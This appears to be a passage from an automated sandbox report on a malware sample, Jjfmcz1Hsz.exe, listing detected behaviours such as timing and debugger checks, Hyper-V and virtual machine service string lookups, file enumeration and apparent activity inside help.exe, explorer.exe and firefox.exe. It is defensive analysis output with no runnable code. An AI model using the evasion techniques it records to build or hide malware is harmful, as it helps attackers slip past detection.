      Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03322732 rdtsc 2_2_03322732
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.8 %
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00405FFD FindFirstFileA,FindClose,2_2_00405FFD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_0040559B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00402688 FindFirstFileA,2_2_00402688
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F42C80 FindFirstFileW,FindNextFileW,FindClose,19_2_02F42C80
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeAPI call chain: ExitProcess graph end nodegraph_2-11422
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeAPI call chain: ExitProcess graph end nodegraph_2-11425
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1181941990.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325068211.0000000001819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1181941990.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325068211.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324658870.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609034203.000000001003C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1598298707.000000000D59E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1468857728.000000000D59E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1482234943.000000001003C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1669286769.000000000D59E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1482349161.0000000010048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680456207.0000000010048000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: Jjfmcz1Hsz.exe, 00000002.00000002.1202756158.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1326566413.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: firefox.exe, 0000001E.00000002.2004622843.00000287E9080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_10001A5D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03322732 rdtsc 2_2_03322732
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03341F52 mov eax, dword ptr fs:[00000030h]2_2_03341F52
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332C96A mov eax, dword ptr fs:[00000030h]2_2_0332C96A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0334415C mov eax, dword ptr fs:[00000030h]2_2_0334415C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332D047 mov eax, dword ptr fs:[00000030h]2_2_0332D047
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CD8A mov eax, dword ptr fs:[00000030h]11_2_1D81CD8A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81CD8A mov eax, dword ptr fs:[00000030h]11_2_1D81CD8A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826D91 mov eax, dword ptr fs:[00000030h]11_2_1D826D91
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D816DA6 mov eax, dword ptr fs:[00000030h]11_2_1D816DA6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4DA7 mov eax, dword ptr fs:[00000030h]11_2_1D8F4DA7
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81DDB0 mov eax, dword ptr fs:[00000030h]11_2_1D81DDB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D827DB6 mov eax, dword ptr fs:[00000030h]11_2_1D827DB6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852DBC mov eax, dword ptr fs:[00000030h]11_2_1D852DBC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852DBC mov ecx, dword ptr fs:[00000030h]11_2_1D852DBC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D818DCD mov eax, dword ptr fs:[00000030h]11_2_1D818DCD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DADD6 mov eax, dword ptr fs:[00000030h]11_2_1D8DADD6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DADD6 mov eax, dword ptr fs:[00000030h]11_2_1D8DADD6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82BDE0 mov eax, dword ptr fs:[00000030h]11_2_1D82BDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84FDE0 mov eax, dword ptr fs:[00000030h]11_2_1D84FDE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8ECDEB mov eax, dword ptr fs:[00000030h]11_2_1D8ECDEB
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8ECDEB mov eax, dword ptr fs:[00000030h]11_2_1D8ECDEB
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF4 mov eax, dword ptr fs:[00000030h]11_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81EDFA mov eax, dword ptr fs:[00000030h]11_2_1D81EDFA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B8D0A mov eax, dword ptr fs:[00000030h]11_2_1D8B8D0A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD00 mov eax, dword ptr fs:[00000030h]11_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D840D01 mov eax, dword ptr fs:[00000030h]11_2_1D840D01
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DBD08 mov eax, dword ptr fs:[00000030h]11_2_1D8DBD08
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DBD08 mov eax, dword ptr fs:[00000030h]11_2_1D8DBD08
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84CD10 mov eax, dword ptr fs:[00000030h]11_2_1D84CD10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84CD10 mov ecx, dword ptr fs:[00000030h]11_2_1D84CD10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81FD20 mov eax, dword ptr fs:[00000030h]11_2_1D81FD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov ecx, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84AD20 mov eax, dword ptr fs:[00000030h]11_2_1D84AD20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0D24 mov eax, dword ptr fs:[00000030h]11_2_1D8D0D24
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0D24 mov eax, dword ptr fs:[00000030h]11_2_1D8D0D24
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0D24 mov eax, dword ptr fs:[00000030h]11_2_1D8D0D24
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0D24 mov eax, dword ptr fs:[00000030h]11_2_1D8D0D24
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4D4B mov eax, dword ptr fs:[00000030h]11_2_1D8F4D4B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D819D46 mov eax, dword ptr fs:[00000030h]11_2_1D819D46
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D819D46 mov eax, dword ptr fs:[00000030h]11_2_1D819D46
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D819D46 mov ecx, dword ptr fs:[00000030h]11_2_1D819D46
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89CD40 mov eax, dword ptr fs:[00000030h]11_2_1D89CD40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89CD40 mov eax, dword ptr fs:[00000030h]11_2_1D89CD40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E5D43 mov eax, dword ptr fs:[00000030h]11_2_1D8E5D43
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E5D43 mov eax, dword ptr fs:[00000030h]11_2_1D8E5D43
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DD4D mov eax, dword ptr fs:[00000030h]11_2_1D83DD4D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DD4D mov eax, dword ptr fs:[00000030h]11_2_1D83DD4D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DD4D mov eax, dword ptr fs:[00000030h]11_2_1D83DD4D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D821D50 mov eax, dword ptr fs:[00000030h]11_2_1D821D50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D821D50 mov eax, dword ptr fs:[00000030h]11_2_1D821D50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A1D5E mov eax, dword ptr fs:[00000030h]11_2_1D8A1D5E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D835D60 mov eax, dword ptr fs:[00000030h]11_2_1D835D60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F5D65 mov eax, dword ptr fs:[00000030h]11_2_1D8F5D65
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BD71 mov eax, dword ptr fs:[00000030h]11_2_1D85BD71
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85BD71 mov eax, dword ptr fs:[00000030h]11_2_1D85BD71
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817C85 mov eax, dword ptr fs:[00000030h]11_2_1D817C85
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817C85 mov eax, dword ptr fs:[00000030h]11_2_1D817C85
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817C85 mov eax, dword ptr fs:[00000030h]11_2_1D817C85
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817C85 mov eax, dword ptr fs:[00000030h]11_2_1D817C85
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817C85 mov eax, dword ptr fs:[00000030h]11_2_1D817C85
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C9C98 mov ecx, dword ptr fs:[00000030h]11_2_1D8C9C98
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C9C98 mov eax, dword ptr fs:[00000030h]11_2_1D8C9C98
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C9C98 mov eax, dword ptr fs:[00000030h]11_2_1D8C9C98
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C9C98 mov eax, dword ptr fs:[00000030h]11_2_1D8C9C98
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D827C95 mov eax, dword ptr fs:[00000030h]11_2_1D827C95
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D827C95 mov eax, dword ptr fs:[00000030h]11_2_1D827C95
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DFC95 mov eax, dword ptr fs:[00000030h]11_2_1D8DFC95
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D816CC0 mov eax, dword ptr fs:[00000030h]11_2_1D816CC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D816CC0 mov eax, dword ptr fs:[00000030h]11_2_1D816CC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D816CC0 mov eax, dword ptr fs:[00000030h]11_2_1D816CC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D856CC0 mov eax, dword ptr fs:[00000030h]11_2_1D856CC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D859CCF mov eax, dword ptr fs:[00000030h]11_2_1D859CCF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82FCC9 mov eax, dword ptr fs:[00000030h]11_2_1D82FCC9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DCD1 mov eax, dword ptr fs:[00000030h]11_2_1D83DCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DCD1 mov eax, dword ptr fs:[00000030h]11_2_1D83DCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83DCD1 mov eax, dword ptr fs:[00000030h]11_2_1D83DCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CCD1 mov ecx, dword ptr fs:[00000030h]11_2_1D85CCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CCD1 mov eax, dword ptr fs:[00000030h]11_2_1D85CCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CCD1 mov eax, dword ptr fs:[00000030h]11_2_1D85CCD1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D848CDF mov eax, dword ptr fs:[00000030h]11_2_1D848CDF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D848CDF mov eax, dword ptr fs:[00000030h]11_2_1D848CDF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4CD2 mov eax, dword ptr fs:[00000030h]11_2_1D8F4CD2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B3CD4 mov eax, dword ptr fs:[00000030h]11_2_1D8B3CD4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B3CD4 mov eax, dword ptr fs:[00000030h]11_2_1D8B3CD4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B3CD4 mov ecx, dword ptr fs:[00000030h]11_2_1D8B3CD4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B3CD4 mov eax, dword ptr fs:[00000030h]11_2_1D8B3CD4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8B3CD4 mov eax, dword ptr fs:[00000030h]11_2_1D8B3CD4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817CF1 mov eax, dword ptr fs:[00000030h]11_2_1D817CF1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823CF0 mov eax, dword ptr fs:[00000030h]11_2_1D823CF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D823CF0 mov eax, dword ptr fs:[00000030h]11_2_1D823CF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84ECF3 mov eax, dword ptr fs:[00000030h]11_2_1D84ECF3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84ECF3 mov eax, dword ptr fs:[00000030h]11_2_1D84ECF3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89CCF0 mov ecx, dword ptr fs:[00000030h]11_2_1D89CCF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852C10 mov eax, dword ptr fs:[00000030h]11_2_1D852C10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852C10 mov eax, dword ptr fs:[00000030h]11_2_1D852C10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852C10 mov eax, dword ptr fs:[00000030h]11_2_1D852C10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852C10 mov eax, dword ptr fs:[00000030h]11_2_1D852C10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C20 mov eax, dword ptr fs:[00000030h]11_2_1D833C20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83AC20 mov eax, dword ptr fs:[00000030h]11_2_1D83AC20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83AC20 mov eax, dword ptr fs:[00000030h]11_2_1D83AC20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83AC20 mov eax, dword ptr fs:[00000030h]11_2_1D83AC20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E5C38 mov eax, dword ptr fs:[00000030h]11_2_1D8E5C38
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E5C38 mov ecx, dword ptr fs:[00000030h]11_2_1D8E5C38
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D854C3D mov eax, dword ptr fs:[00000030h]11_2_1D854C3D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D818C3D mov eax, dword ptr fs:[00000030h]11_2_1D818C3D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81DC40 mov eax, dword ptr fs:[00000030h]11_2_1D81DC40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C40 mov eax, dword ptr fs:[00000030h]11_2_1D833C40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4C59 mov eax, dword ptr fs:[00000030h]11_2_1D8F4C59
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A3C57 mov eax, dword ptr fs:[00000030h]11_2_1D8A3C57
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov ecx, dword ptr fs:[00000030h]11_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C60 mov eax, dword ptr fs:[00000030h]11_2_1D833C60
